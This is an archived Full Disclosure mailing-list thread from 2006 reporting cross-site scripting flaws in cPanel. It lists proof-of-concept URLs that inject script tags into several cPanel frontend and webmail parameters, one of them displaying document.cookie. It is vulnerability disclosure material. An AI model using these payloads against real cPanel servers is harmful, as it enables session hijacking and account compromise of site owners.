Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

fulldisclosure logo Full Disclosure mailing list archives

Re: cPanel Multiple Cross Site Scripting Vulnerability
From: Sumit Siddharth <sumit.siddharth () gmail com>
Date: Fri, 3 Feb 2006 12:18:27 +0530
An addition to your POC :)
http://localhost:2095/webmailaging.cgi?numdays=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&ageaction=change
Thanks
Sumit

On 2/3/06, Sullo <csullo () gmail com> wrote:

On 3/13/2004 I notified cPanel that they had major XSS issues in their
backend... beyond what I was actually sending them or documenting, and they
should fix them. They agreed.

However, based on this, it doesn't look like they've done much in the two
years since I posted:
   http://www.cirt.net/advisories/cpanel_xss.shtml


On 2/2/06, simo () morx org <simo () morx org> wrote:


Title: cPanel Multiple Cross Site Scripting
Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
Affected scripts with proof of concept exploit:




http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=

<script>alert('vul')</script>&domain=



http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=

<script>alert('vul')</script>&domain=xxx



http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0

"><script>alert('vul')</script>



http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target=

"><script>alert('vul')</script>



http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx

"><script>alert('vul')</script>&target=xxx



http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006

"><script>alert('vul')</script>&domain=xxx&target=xxx



http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan

"><script>alert('vul')</script>&year=2006&domain=xxx&target=xxx



--

http://www.cirt.net     |      http://www.osvdb.org/





--

Sumit Siddharth
Information Security Analyst
NII Consulting
Web: www.nii.co.in
------------------------------------
NII Security Advisories
http://www.nii.co.in/resources/advisories.html
------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]